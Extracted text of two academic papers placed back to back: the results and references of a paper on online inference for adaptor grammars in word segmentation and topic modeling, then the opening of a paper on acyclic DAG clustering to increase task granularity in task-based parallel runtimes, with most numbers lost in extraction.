) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) variational . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) . ( . ) table : word segmentation accuracy measured by word token f scores and negative log-likelihood on held-out test dataset in the brackets (lower the better, on the scale of ) for our online model against mcmc approach (johnson et al., ) on various dataset using the unigram and collocation grammar. e+ e+ e+ e+ e+ # of inside−outside function calls f− s co re model mcmc online variational (a) unigram grammar. e+ e+ e+ e+ e+ # of inside−outside function calls f− s co re model mcmc online variational (b) collocation grammar. figure : word segmentation accuracy measured by word token f scores on brent corpus of three approaches against number of inside-outside function call using unigram (upper) and collo- cation (lower) grammars in table . our online settings are batch size b = , decay inertia τ = , decay rate κ = . for unigram grammar; and mini- batch size b = , decay inertia τ = , decay rate κ = . for collocation grammar. tng s are refined at interval u = . truncation size is set to kword = . k and kcolloc = k. the settings are chosen from cross validation. we observe simi- lar behavior under κ = { . , . , . }, τ = { , , }, b = { , } and u = { , , }. for online inference, we parallelize each minibatch with four threads with settings: batch size b = and tng refine- ment interval u = . online approach runns for two passes over datasets. variational runs fifty iterations, with the same truncation level as in online. for negative log-likelihood eval- uation, we train the model on a random % of the data, and hold out the rest for testing. we observe similar behavior for . word segmentation we evaluate our online adaptor grammar on the task of word segmentation, which focuses on identify- ing word boundaries from a sequence of characters. this is especially the case for chinese, since char- acters are written in sequence without word bound- aries. we first evaluate all three models on the stan- dard brent version of the bernstein-ratner cor- pus (bernstein-ratner, ; brent and cartwright, , brent). the dataset contains k sentences, . k distinct words, and distinct characters. we compare the results on both unigram and colloca- tion grammars introduced in johnson and goldwater ( ) as listed in table . figure illustrates the word segmentation ac- curacy in terms of word token f -scores on brent against the number of inside-outside function calls for all three approaches using unigram and colloca- tion grammars. in both cases, our online approach converges faster than mcmc and variational ap- proaches, yet yields comparable or better perfor- mance when seeing more data. in addition to the brent corpus, we also evalu- ate three approaches on three other chinese datasets compiled by xue et al. ( ) and emerson ( ): • chinese treebank . (ctb ): k sentences, k distinct words, . k distinct characters; our model under κ = { . , . } and τ = { , }. we use all punctuation as natural delimiters (i.e., words cannot cross punctuation). • peking university (pku): k sentences, k distinct words, . k distinct characters; and • city university of hong kong (cityu): k sentences, k distinct words, and k distinct characters. we compare our inference method against other approaches on f score. while other unsupervised word segmentation systems are available (mochi- hashi et al. 
( ), inter alia), our focus is on a di- rect comparison of inference techniques for adaptor grammar, which achieve competitive (if not state-of- the-art) performance. table shows the word token f -scores and neg- ative likelihood on held-out test dataset of our model against mcmc and variational. we randomly sample % of the data for testing and the rest for training. we compute the held-out likelihood of the most likely sampled parse trees out of each model. our online approach consistently better segments words than variational and achieves comparable or better results than mcmc. for mcmc, johnson and goldwater ( ) show that incremental initialization—or online updates in general—results in more accurate word segmenta- tion, even though the trees have lower posterior probability. similarly, our online approach initial- izes and learns them on the fly, instead of initializing the grammatons and parse trees for all data upfront as for variational. this uniformly outperforms batch initialization on the word segmentation tasks. . infinite vocabulary topic modeling topic models often can be replicated using a care- fully crafted pcfg (johnson, ). these pow- erful extensions can capture topical collocations and sticky topics; these embelishments could fur- ther improve nlp applications of simple unigram topic models such as word sense disambigua- tion (boyd-graber and blei, ), part of speech their results are not directly comparable: they use different subsets and assume different preprocessing. note that this is only an approximation to the true held-out likelihood, since it is impossible to enumerate all the possible parse trees and hence compute the likelihood for a given sen- tence under the model. we train all models with topics with settings: tng re- finement interval u = , truncation size ktopic = k, and the mini-batch size b = . we observe a similar behavior under κ ∈{ . , . } and τ ∈{ , }. . . # of passes over the dataset pm i inference infvoc mcmc online variational ⌧ : ⌧ : ⌧ :  . . # of passes over the dataset pm i inference infvoc mcmc online variational co he re nc e figure : the average coherence score of topics on de-news datasets against infvoc approach and other inference tech- niques (mcmc, variational) under different settings of de- cay rate κ and decay inertia τ using the infvoc lda grammar in table . the horizontal axis shows the number of passes over the entire dataset. tagging (toutanova and johnson, ) or dialogue modeling (?). however, expressing topic models in adaptor grammars is much slower than traditional topic models, for which fast online inference (hoff- man et al., ) is available. zhai and boyd-graber ( ) argue that online inference and topic models violate a fundamental as- sumption in online algorithms: new words are intro- duced as more data are streamed to the algorithm. zhai and boyd-graber ( ) introduce an infer- ence framework, infvoc, to discover words from a dirichlet process with a character n-gram base dis- tribution. we show that their complicated model and on- line inference can be captured and extended via an appropriate pcfg grammar and our online adap- tor grammar inference algorithm. our extension to infvoc generalizes their static character n-gram model, learning the base distribution (i.e., how words are composed from characters) from data. in contrast, their base distribution was learned from a dictionary as a preprocessing step and held fixed. this is an attractive testbed for our online infer- ence. 
within a topic, we can verify that the words we discover are relevant to the topic and that new words rise in importance in the topic over time if they are relevant. for these experiments, we treat each token (with its associated document pseudo-word −j) as a single sentence, and each minibatch contains only one sentence (token). the plot is generated with truncation size ktopic = k, mini-batch size b = , truncation pruning interval u = , decay inertia τ = , and decay rate κ = . . all py hyper- parameters are optimized. new words added at corresponding minibatch minibatch- k ... -union -wage ... -minist ... -year ... -bill ... -increas -tax ... -reform ... -lower ... -percent ... -committe ... -pension ... minibatch- k -year -minist -tax -pension -reform ... -committe ... -percent ... -lower ... -increas ... -bill ... -union -wage ... -schroeder ... -deduct ... minibatch- k -deduct -tax -year -pension -reform ... -minist ... -increas ... -committe ... -schroeder -percent ... -lower ... -bill ... -union ... -wage ... minibatch- k -tax -year -reform -pension -minist -increas ... -schroeder ... -committe ... -percent ... -lower ... -bill ... -union ... -deduct ... -wage ... minibatch- k -tax -reform -pension -year -minist -increas ... -lower ... -percent ... -committe ... -bill ... -wage ... -union ... -schroeder ... -deduct ... minibatch- k -reform ... -increas ... -union ... -wage ... -percent ... -year ... -tax ... -minist ... -bill ... -lower pension committe ... schroeder affair ... minibatch- k ... -percent -tax -reform ... -year -increas ... -wage ... -minist ... -union ... -lower ... -schroeder ... -bill ... -committe ... -pension ... deduct shop ... recess ... primarili ... minibatch- k -tax -schroeder -year -reform -minist -pension ... -increas ... -lower ... -percent -committe ... -union ... -bill ... -wage ... -deduct ... recipi ... minibatch- k -tax -year -reform -schroeder -increas -minist ... -pension ... -percent ... -lower ... -bill ... -committe ... -union ... -wage ... -deduct ... alloc ... club ... figure : the evolution of one topic—concerning tax policy—out of five topics learned using online adaptor grammar inference on the de-news dataset. each minibatch represents a word processed by this online algorithm; time progresses from left to right. as the algorithm encounters new words (bottom) they can make their way into the topic. the numbers next to words represent their overall rank in the topic. for example, the word “pension” first appeared in mini-batch , was ranked at after minibatch and became one of the top words in this topic after minibatches (tokens). quantitatively, we evaluate three different infer- ence schemes and the infvoc approach on a col- lection of english daily news snippets (de-news). we used the infvoc lda grammar (table ). for all approaches, we train the model with five topics, and evaluate topic coherence (newman et al., ), which correlates well with human ratings of topic interpretability (chang et al., ). we collect the co-occurrence counts from wikipedia and compute the average pairwise pointwise mutual information (pmi) score between the top ranked words of ev- ery topic. figure illustrates the pmi score for both approaches. our approach yields comparable or bet- ter results against all other approaches under most conditions. qualitatively, figure shows an example of a topic evolution using online adaptor grammar for the de-news dataset. the topic is about “tax pol- icy”. 
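the coherence numbers reported above are average pairwise pmi scores between the top-ranked words of each topic, with co-occurrence statistics collected from wikipedia. a minimal sketch of that metric for a single topic follows, assuming document-level counts from a reference corpus; skipping unseen word pairs is a simplification of this sketch, not necessarily the paper's handling.

```python
import math
from itertools import combinations

def pmi_coherence(top_words, joint_counts, word_counts, total_docs):
    """average pairwise pmi over the top-ranked words of one topic.
    joint_counts[(w1, w2)] and word_counts[w] are document-level
    co-occurrence / occurrence counts from a reference corpus;
    total_docs is the number of reference documents."""
    scores = []
    for w1, w2 in combinations(sorted(set(top_words)), 2):
        joint = joint_counts.get((w1, w2), 0) + joint_counts.get((w2, w1), 0)
        if joint == 0 or word_counts.get(w1, 0) == 0 or word_counts.get(w2, 0) == 0:
            continue  # pmi undefined for unseen pairs; skipped in this sketch
        p_joint = joint / total_docs
        p1 = word_counts[w1] / total_docs
        p2 = word_counts[w2] / total_docs
        scores.append(math.log(p_joint / (p1 * p2)))
    return sum(scores) / len(scores) if scores else 0.0
```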
the topic improves over time; words like “year”, “tax” and “minist(er)” become more promi- nent. more importantly, the online approach discov- available at http://www.umiacs.umd.edu/˜zhaike/. the de-news dataset is randomly selected subset of . k english documents from http://homepages.inf.ed.ac. uk/pkoehn/publications/de-news/. it contains . k unique types and over k word tokens. tokenization and stemming provided by nltk (bird et al., ). ers new words and incorporates them into the topic. for example, “schroeder” (former german chancel- lor) first appeared in minibatch , was success- fully picked up by our model, and became one of the top ranked words in the topic. conclusion probabilistic modeling is a useful tool in understand- ing unstructured data or data where the structure is latent, like language. however, developing these models is often a difficult process, requiring signifi- cant machine learning expertise. adaptor grammars offer a flexible and quick way to prototype and test new models. despite ex- pensive inference, they have been used for topic modeling (johnson, ), discovering perspec- tive (hardisty et al., ), segmentation (johnson and goldwater, ), and grammar induction (co- hen et al., ). we have presented a new online, hybrid inference scheme for adaptor grammars. unlike previous ap- proaches, it does not require extensive preprocess- ing. it is also able to faster discover useful structure in text; with further development, these algorithms could further speed the development and application of new nonparametric models to large datasets. acknowledgments we would like to thank the anonymous reviewers, kristina toutanova, mark johnson, and ke wu for insightful discussions. this work was supported by nsf grant ccf- . boyd-graber is also supported by nsf grant iis- . any opin- ions, findings, conclusions, or recommendations ex- pressed here are those of the authors and do not nec- essarily reflect the view of the sponsor. references nan bernstein-ratner. . the phonology of parent child speech. children’s language, : – . steven bird, ewan klein, and edward loper. . nat- ural language processing with python. o’reilly me- dia. christopher m. bishop. . pattern recognition and machine learning. springer-verlag new york, inc., secaucus, nj, usa. david m. blei and michael i. jordan. . variational inference for dirichlet process mixtures. journal of bayesian analysis, ( ): – . benjamin börschinger and mark johnson. . using rejuvenation to improve particle filtering for bayesian word segmentation. in proceedings of the association for computational linguistics. léon bottou. . online algorithms and stochastic approximations. in online learning and neural net- works. cambridge university press, cambridge, uk. jordan boyd-graber and david m. blei. . putop: turning predominant senses into a topic model for wsd. in th international workshop on semantic evaluations. michael r. brent and timothy a. cartwright. . dis- tributional regularity and phonotactic constraints are useful for segmentation. volume , pages – . jonathan chang, jordan boyd-graber, and david m. blei. . connections between the lines: augment- ing social networks with text. in knowledge discovery and data mining. jean-cédric chappelier and martin rajman. . monte-carlo sampling for np-hard maximization problems in the framework of weighted parsing. in natural language processing, pages – . shay b. cohen, david m. blei, and noah a. smith. . variational inference for adaptor grammars. 
in conference of the north american chapter of the as- sociation for computational linguistics. shay b. cohen. . computational learning of prob- abilistic grammars in the unsupervised setting. ph.d. thesis, carnegie mellon university. thomas emerson. . the second international chi- nese word segmentation bakeoff. in fourth sighan workshop on chinese language, jeju, korea. thomas s. ferguson. . a bayesian analysis of some nonparametric problems. the annals of statis- tics, ( ). sharon goldwater, thomas l. griffiths, and mark john- son. . producing power-law distributions and damping word frequencies with two-stage language models. journal of machine learning research, pages – , july. eric hardisty, jordan boyd-graber, and philip resnik. . modeling perspective using adaptor grammars. in proceedings of emperical methods in natural lan- guage processing. matthew hoffman, david m. blei, and francis bach. . online learning for latent dirichlet allocation. in proceedings of advances in neural information processing systems. matthew hoffman, david m. blei, chong wang, and john paisley. . stochastic variational inference. in journal of machine learning research. mark johnson and sharon goldwater. . improving nonparameteric bayesian inference: experiments on unsupervised word segmentation with adaptor gram- mars. in conference of the north american chapter of the association for computational linguistics. mark johnson, thomas l. griffiths, and sharon goldwa- ter. . adaptor grammars: a framework for speci- fying compositional nonparametric bayesian models. in proceedings of advances in neural information processing systems. mark johnson, thomas l. griffiths, and sharon goldwa- ter. . bayesian inference for pcfgs via markov chain monte carlo. in conference of the north ameri- can chapter of the association for computational lin- guistics. mark johnson. . pcfgs, topic models, adaptor grammars and learning topical collocations and the structure of proper names. in proceedings of the as- sociation for computational linguistics. kenichi kurihara, max welling, and yee whye teh. . collapsed variational dirichlet process mixture models. in international joint conference on artifi- cial intelligence. christopher d. manning and hinrich schütze. . foundations of statistical natural language process- ing. the mit press, cambridge, ma. david mimno, matthew hoffman, and david blei. . sparse stochastic inference for latent dirichlet alloca- tion. in proceedings of the international conference of machine learning. daichi mochihashi, takeshi yamada, and naonori ueda. . bayesian unsupervised word segmentation with nested pitman-yor language modeling. in proceedings of the association for computational linguistics. peter müller and fernando a. quintana. . non- parametric bayesian data analysis. statistical science, ( ). ramesh nallapati, william cohen, and john lafferty. . parallelized variational em for latent dirichlet allocation: an experimental evaluation of speed and scalability. in icdmw. david newman, sarvnaz karimi, and lawrence cave- don. . external evaluation of topic models. in proceedings of the aurstralasian document comput- ing symposium. j. pitman and m. yor. . the two-parameter poisson- dirichlet distribution derived from a stable subordina- tor. annals of probability, ( ): – . hiroyuki shindo, yusuke miyao, akinori fujino, and masaaki nagata. . bayesian symbol-refined tree substitution grammars for syntactic parsing. in pro- ceedings of the association for computational lin- guistics. erik b. 
sudderth and michael i. jordan. . shared segmentation of natural scenes using depen- dent pitman-yor processes. in proceedings of ad- vances in neural information processing systems. yee whye teh, michael i. jordan, matthew j. beal, and david m. blei. . hierarchical dirichlet pro- cesses. journal of the american statistical associa- tion, ( ): – . kristina toutanova and mark johnson. . a bayesian lda-based model for semi-supervised part- of-speech tagging. in proceedings of advances in neural information processing systems, pages – . martin j. wainwright and michael i. jordan. . graphical models, exponential families, and varia- tional inference. foundations and trends in machine learning, ( – ): – . chong wang and david m. blei. . truncation-free online variational inference for bayesian nonparamet- ric models. in proceedings of advances in neural in- formation processing systems. naiwen xue, fei xia, fu-dong chiou, and marta palmer. . the penn chinese treebank: phrase structure annotation of a large corpus. natural language engi- neering. limin yao, david mimno, and andrew mccallum. . efficient methods for topic model inference on streaming document collections. in knowledge dis- covery and data mining. ke zhai and jordan boyd-graber. . online latent dirichlet allocation with infinite vocabulary. in pro- ceedings of the international conference of machine learning. ke zhai and jason d. williams. . discovering latent structure in task-oriented dialogues. in proceedings of the association for computational linguistics. ke zhai, jordan boyd-graber, nima asadi, and mo- hamad alkhouja. . mr. lda: a flexible large scale topic modeling package using variational infer- ence in mapreduce. in proceedings of world wide web conference. submitted september accepted november published january corresponding author bérenger bramas, berenger.bramas@inria.fr academic editor gang mei additional information and declarations can be found on page doi . /peerj-cs. copyright bramas and ketterlin distributed under creative commons cc-by . open access improving parallel executions by increasing task granularity in task-based runtime systems using acyclic dag clustering bérenger bramas , and alain ketterlin , , camus, inria nancy - grand est, nancy, france icps team, icube, illkirch-graffenstaden, france université de strasbourg, strasbourg, france abstract the task-based approach is a parallelization paradigm in which an algorithm is transformed into a direct acyclic graph of tasks: the vertices are computational elements extracted from the original algorithm and the edges are dependencies between those. during the execution, the management of the dependencies adds an overhead that can become significant when the computational cost of the tasks is low. a possibility to reduce the makespan is to aggregate the tasks to make them heavier, while having fewer of them, with the objective of mitigating the importance of the overhead. in this paper, we study an existing clustering/partitioning strategy to speed up the parallel execution of a task-based application. we provide two additional heuristics to this algorithm and perform an in-depth study on a large graph set. in addition, we propose a new model to estimate the execution duration and use it to choose the proper granularity. we show that this strategy allows speeding up a real numerical application by a factor of on a multi-core system. 
subjects algorithms and analysis of algorithms, distributed and parallel computing, scientific computing and simulation keywords task-based, graph, dag, clustering, partitioning introduction the task-based (tb) approach has become a popular method to parallelize scientific applications in the high-performance computing (hpc) community. compared to the classical approaches, such as the fork-join and spawn-sync paradigms, it offers several advantages as it allows to describe the intrinsic parallelism of any algorithms and run parallel executions without global synchronizations. behind the scenes, most of the runtime systems that manage the tasks use a direct acyclic graph where the nodes represent the tasks and the edges represent the dependencies. in this model, a task becomes ready when all its predecessors in the graph are completed, which causes the use a local synchronization mechanism inside the runtime system to manage the dependencies. there are now many task-based runtime systems (danalis et al., ; perez, badia & labarta, ; gautier et al., ; bauer et al., ; tillenius, ; augonnet et al., ; bramas, b) and each of them has its own specificity, capabilities and interface. moreover, the well-known and how to cite this article bramas b, ketterlin a. . improving parallel executions by increasing task granularity in task-based runtime systems using acyclic dag clustering. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:berenger.bramas@inria.fr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. widely used openmp standard (openmp architecture review board, ) also supports the tasks and dependencies paradigm since version . the advantage of the method to achieve high-performance and facilitate the use of heterogeneous computing nodes has been demonstrated by the development of many applications in various fields (sukkari et al., ; moustafa et al., ; carpaye, roman & brenner, ; agullo et al., ; agullo et al., ; agullo et al., ; myllykoski & mikkelsen, ). however, multiple challenges remain open to bring the task-based approach to non-hpc experts and to support performance portability. in our opinion, the two main problems on a single computing node concern the scheduling and granularity. the scheduling is the distribution of the tasks over the processing units, i.e., the selection of a task among the ready ones and the choice of a processing unit. this is a difficult problem, especially when using heterogeneous computing nodes as it cannot be solved optimally in general. much research is continuously conducted by the hpc and the scheduling communities to provide better generic schedulers (bramas, a). the granularity issue is related to the size of the tasks. when the granularity is too small, the overhead of task management, and the potential data movements, becomes dominant and can dramatically increase the execution time due to the use of synchronizations (tagliavini, cesarini & marongiu, ). on the other hand, when the granularity is too large, it reduces the degree of parallelism and leaves some processing units idle. managing the granularity can be done at different levels. 
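as a minimal illustration of the tasks-and-dependencies paradigm recalled above, the following openmp sketch (our own example, not taken from any of the cited runtime systems) creates two independent tasks and a third task that becomes ready only once both have completed:

```cpp
#include <cstdio>

int main() {
    int x = 0, y = 0, z = 0;
    #pragma omp parallel
    #pragma omp single
    {
        // two independent tasks: they may run concurrently on different threads
        #pragma omp task depend(out: x)
        { x = 1; }
        #pragma omp task depend(out: y)
        { y = 2; }
        // this task is released only when both predecessors are done,
        // exactly like a node whose input dependencies are satisfied in a dag of tasks
        #pragma omp task depend(in: x, y) depend(out: z)
        { z = x + y; }
        #pragma omp taskwait
    }
    std::printf("z = %d\n", z);
    return 0;
}
```

compiled with -fopenmp, the last task is released by the runtime through exactly the kind of dependency management whose overhead is discussed in this paper; without openmp the pragmas are ignored and the code runs sequentially.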
in some cases, it is possible to let the developer adapt the original algorithms, computational kernels, and data structures, but this could require significant programming effort and expertise (bramas, ). an alternative, as we aim to study in this paper, is to investigate how to cluster the nodes of task graphs to increase the granularity of the tasks and thus obtain faster execution by mitigating the overhead from the management of the dependencies. an important asset of this approach is that working at the graph level allows creating a generic method independent from the application and what is done at the user level, but also independent of the task-based runtime system that will be used underneath. while graph partitioning/clustering is a well-studied problem, it is important to note that the obtained meta-dag (direct acyclic graph) must remain acyclic, i.e., the dependencies between the cluster of nodes should ensure to be executable as a graph of tasks, and keep a large degree of parallelism. hence, the usual graph partitioning methods do not work because they do not take into account the direction of the edges (hendrickson & kolda, ). moreover, the dag of tasks we target can be of several million nodes, and we need an algorithm capable to process them. in the current study, we use a generic algorithm that has been proposed to solve this problem (rossignon et al., ), and we refer to it as the general dag clustering algorithm (gdca). the contributions of the paper are the following: • we provide two variants of the gdca, which change how the nodes are aggregated and allow to have clusters smaller than the targeted size; bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. an implementation of our method is publicly available at https://gitlab.inria. fr/bramas/dagpar. besides, we provide the test cases used in this paper at https: //figshare.com/projects/dagpar/ . • we provide a new model to simulate the execution of a dag, by considering that there are overheads in the execution of each task, but also while releasing or picking a task, and we use this model to find the best clustering size; • we evaluate and compare dgca and our approach on a large graph set using emulated executions; • we evaluate and compare dgca and our approach on chukrut (conservative hyperbolic upwind kinetic resolution of unstructured tokamaks) (coulette et al., ) that computes the transport equation on a d unstructured mesh. the paper is organized as follows. in ‘related work’, we summarize the related work and explain why most existing algorithms do not solve the dag of tasks clustering problem. then, in ‘problem statement and notations’, we describe in detail the dag of tasks clustering problem. we introduce the modifications of the gdca in ‘dag of tasks clustering’. finally, we evaluate our approach in ‘experimental study’. the source code of the presented method and all the material needed to reproduce the results of this paper are publicly available . related work partitioning or clustering usually refers to dividing a graph into subsets so that the sum of costs on edges between nodes in different subsets is minimum. however, our objective here is not related to the costs of the edges, which we consider null, but to the execution time of the resulting graph in parallel considering a given number of threads and runtime overhead. 
hence, while it is generally implicit that partitioning/clustering is related to the edge cut, we emphasize that it should be seen as a graph symbolic transformation and that the measure of quality and final objective differ depending on the problem to solve. partitioning tends to refer to finding a given number of subgraphs, which is usually much lower than the number of nodes. in fact, once a graph is partitioned, it is usually dispatched over different processes and thus there must be as many subgraphs as there are processes, whereas clustering is more about finding subgraphs of a given approximate size or bounded by a given size limit, where nodes are grouped together if it appears that they have a certain affinity. this is a reason why the term clustering is also used to describe algorithms that cluster indirect graphs by finding hot spots (schaeffer, ; xu & tian, ; shun et al., ). moreover, the size of a cluster is expected to be much lower than the number of nodes. the granularity problem of the dag of tasks with a focus on the parallel execution has been previously studied. sarkar and hennessy designed a method to execute functional programs at a coarse granularity because working at fine granularity, i.e. at the instruction level, was inefficient on general purpose multiprocessors (sarkar & hennessy, ; sarkar, ). they proposed a compile-time clustering approach to achieve the trade-off between parallelism and the overhead of exploiting parallelism and worked on graphs obtained directly from the source code. as we do in the current paper, they focused on the performance, i.e. best execution time, as a measure of the quality of the clustering and their estimation of execution times were based on the number of processors, communication bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://gitlab.inria.fr/bramas/dagpar https://gitlab.inria.fr/bramas/dagpar https://figshare.com/projects/dagpar/ https://figshare.com/projects/dagpar/ https://peerj.com http://dx.doi.org/ . /peerj-cs. the thesis that includes this final version is written in french. and scheduling overhead. however, their clustering algorithm is different from ours. it starts by considering each node as a cluster and successively merges them until it obtains a single subgraph while keeping track of the best configuration found so far to be used at the end. by doing so, their algorithm has above quadratic complexity and thus is unusable to process very large graphs. also, in our case, we do not take communication into account, and we consider that some parts of the scheduling overhead are blocking: no threads can peek a task when another thread is already interacting with the scheduler. more recently rossignon et al. ( ) proposed gdca to manage dag of fine grain tasks on multi-core architectures. their first solution is composed of three main algorithms called sequential, front and depth front. the sequential algorithm puts together a task that has only one predecessor with its parent. the front algorithm reduces the width of the graph at each level. the depth front performs a breadth-first traversal of the descendants of a task to aggregate up to a given number of tasks together. they extended this last algorithm (rossignon, ) by proposing a generic method, gdca, that we use in the current study . the authors also provided a new execution model to simulate the execution of a dag where they use an overhead per task and a benefit coefficient for aggregation. 
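to give a flavor of the simplest of the aggregation rules mentioned above, the sketch below applies the "sequential" rule, merging every task that has a single predecessor into the cluster of that predecessor. it is our own illustration under the assumption that tasks are numbered in a topological order; it is not the implementation of rossignon et al.

```cpp
#include <vector>

// illustration of the "sequential" rule: a task with a single predecessor is placed
// in the same cluster as that predecessor; every other task opens a new cluster.
// predecessors[i] lists the predecessors of task i, and tasks are assumed to be
// numbered in a topological order (predecessors have lower ids).
std::vector<int> sequentialClustering(const std::vector<std::vector<int>>& predecessors) {
    const int n = static_cast<int>(predecessors.size());
    std::vector<int> cluster(n, -1);
    int nextCluster = 0;
    for (int u = 0; u < n; ++u) {
        if (predecessors[u].size() == 1) {
            cluster[u] = cluster[predecessors[u].front()]; // join the parent's cluster
        } else {
            cluster[u] = nextCluster++; // roots and join nodes start a new cluster
        }
    }
    return cluster;
}
```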
in a more general context, the community has focused on indirect graph partitioning. a classical approach, called the two-way partitioning, consists in splitting a graph into two blocks of roughly equal size or in minimizing the edge cut between the two blocks (kernighan & lin, ; fiduccia & mattheyses, ). the method can be applied recursively multiple times until the desired number of subgraphs is reached. later, multi- way methods have been proposed (hendrickson & leland, ; karypis & kumar, ; karypis et al., ) and most of them have been done in the context of very-large-scale integration (vlsi) in an integrated circuit. the motivation is to partition large vlsi networks into smaller blocks of roughly equal size to minimize the interconnections between the blocks. the multi-way partitioning has been improved by taking into account the direction of the edges in the context of boolean networks (cong, li & bagrodia, ). the authors showed that considering the direction of the edges is very helpful, if not mandatory, in the design in order to have acyclic partitioning. the problem of acyclic dag partitioning has also been studied by solving the edge- cut problem, i.e., by minimizing the number of weights of the edges having endpoints in different parts and not by focusing on the execution time (herrmann et al., ). we argue that the execution time is the only criteria that should be evaluated and that measuring the edge-cut coefficient is not accurate to estimate the benefit of the clustering. other studies have focused on partitioning with special constraints, such as finding a minimum cost partition of the graph into subsets of size less than or equal to a criteria (kernighan, ), which can be seen as dividing a program into pages of fixed size to minimize the frequency of inter-page transitions. the problem also exists with fpga, where a complete program does not fit in the field and thus should be divided in sub-parts with the objective of minimizing the re-programming (purna & bhatia, ). in linear algebra, the lu factorization can be represented as a tree graph that can be partitioned in linear time (pothen & alvarado, ). bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the real application we used to assess our method solves the transport equation on unstructured meshes. task-based implementations to solve the transport equation on a grid (i.e. structured and regular mesh) have already been proposed by moustafa et al. ( ). the authors have created a version on top of the parsec runtime system where they partitioned the mesh and avoided working on the graph of tasks. working on the mesh is another way to partition the graph, but this was possible in their case because the dependencies on the mesh were known and regular. the dependencies were not impacted by the clustering because an inter-partition dependency would simply be transformed into the exchange of a message. in other words, a process could work on its sub-graph even if some of its nodes are pending for input that will be sent by other processes. this is quite different from our approach, as we consider that a sub-graph is transformed into a macro-task, and hence all input dependencies must be satisfied before a thread starts to work on it. problem statement and notations consider a dag g(v ,e) where the vertices v are tasks and the edges e are the dependencies between those. 
the clustering problem of a dag of tasks consists in finding the best clusters to obtain the minimal makespan possible when the dag is executed on a specific hardware or execution model. implicitly, the hardware or execution model should have some overheads, which could come from the management of the tasks for example, or the minimal execution time will always be obtained without clustering, i.e. on irrealistic hardware without overhead, any clustering of tasks will reduce the degree of parallelism without offering any advantages. finding the optimal solution is np-complete (johnson & garey, ) because it requires to test all the possible combinations of clusters. moreover, evaluating a solution is performed by emulating a parallel execution, which has a complexity of o(v log(w )+e), where w is the number of workers and usually considered constant. in this paper, we solve a sub-problem that we call the clustering problem of a dag of tasks with no-communications since we consider that the weights of the edges are insignificant and the edges are only here to represent the dependencies. this problem is met when moving data has no cost or is negligible, which is the case if the workers are threads and the numa effects negligible or if we use processes but have a way to hide communication with computation. classical partitioning algorithms for indirected graphs cannot be used because they will not obtain an acyclic macro-graph. formally, a macro-graph remains acyclic if for any edge a→b the corresponding clusters c(a)≤c(b) (note that c(a)=c(b) means that a and b are in the same cluster). this is also know as the convexity constraint (sarkar & hennessy, ) where we say that a subgraph h of graph g is convex if any path p(a,b), with a, b ∈h, is completely contained in h. consequently, one way to solve the problem would be to find a valid topological order of the nodes and divide it into clusters. we write m the desired size of clusters, which should be seen as an upper limit such that no cluster will have more than m nodes. parallel efficiency and edge cut. there is a relation between the edge-cut and the parallel execution when the edges represent communication costs between cluster owners. bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (a) (b) figure example of clustering a dag of nodes targeting cluster of m = nodes. if each edge has a weight of , the cut cost is for (a) and for (b). if each node is a task of cost and edges are not taken into account, the parallel execution duration is units for (a) and units for (b). if each node is a task of cost and edges are considered as communication of unit sent sequentially after completion of the clus- ter, the parallel execution duration is units for (a) and units for (b). full-size doi: . /peerjcs. /fig- (a) (b) figure example of clustering a dag of nodes targeting cluster of m = nodes. if each edge has a weight of , the cut cost is for (a) and for (b). if each node is a task of cost and edges are not taken into account, the parallel execution duration is units for (a) and units for (b). if each node is a task of cost and edges are considered as communication of unit sent sequentially after completion of the clus- ter, the parallel execution duration is units for (a) and units for (b). full-size doi: . /peerjcs. /fig- however, looking only at the edge-cut is not relevant when the final and only objective is the parallel efficiency. 
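returning to the acyclicity constraint stated above, it can be checked directly: assuming, as in gdca, that clusters are numbered in the order in which they are created, the sketch below (our own illustration, with names of our choosing) builds the deduplicated macro-edges and verifies that every original edge a→b satisfies c(a) ≤ c(b).

```cpp
#include <set>
#include <utility>
#include <vector>

// edges holds the task-level dependencies (a -> b); cluster[i] is the cluster of task i,
// with clusters assumed to be numbered in their creation (topological-like) order.
bool clusteringIsValid(const std::vector<std::pair<int,int>>& edges,
                       const std::vector<int>& cluster,
                       std::set<std::pair<int,int>>& macroEdges) {
    macroEdges.clear();
    for (const auto& e : edges) {
        const int ca = cluster[e.first];
        const int cb = cluster[e.second];
        if (ca > cb) {
            return false; // a backward inter-cluster edge would make the macro-graph cyclic
        }
        if (ca != cb) {
            // one or many task-level edges between two clusters collapse
            // into a single macro-dependency
            macroEdges.insert({ca, cb});
        }
    }
    return true;
}
```

the set also makes explicit why the number of original edges between two clusters does not matter: duplicates collapse into one macro-dependency between the two macro-tasks.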
moreover, this is even truer in our case because the weights of the edges are neglected. to illustrate the differences, we provide in figs. and examples that demonstrate that when attempting to obtain a faster execution, the edge-cut is not the most important feature. in both examples, the configuration with the lowest edge-cut is slower when executed in parallel whether communications are taken into account or not. clustering and delay in releasing dependencies. traditionally, graph partitioning is used to distribute the workload on different processes while trying to minimize communications. in our case, however, a cluster is a macro-task and is managed like a task: it has to wait bramas and ketterlin ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. (a) (b) (c) figure example of clustering three dags of eight nodes targeting in two cluster of m = nodes. the obtained meta-dag is the same despite the original dependencies between the nodes, and the cluster on the right will have to wait that the cluster on the left is fully executed to become ready. (a) graph with a dependency between the two first nodes. (b) graph with dependencies between first and last nodes. (c) graph with multiple dependencies. full-size doi: . /peerjcs. /fig- for all its dependencies to be released to become ready, and it releases its dependencies once it is entirely completed and not after the completion of each task that composes it. this means the number of dependencies that exists originally between the tasks of two macro-tasks is not relevant, because if there is one or many then the two macro-tasks are linked, as illustrated by the fig. . a side effect is that creating macro-tasks delays the release of the dependencies. in fact, the release of the dependencies can be delayed 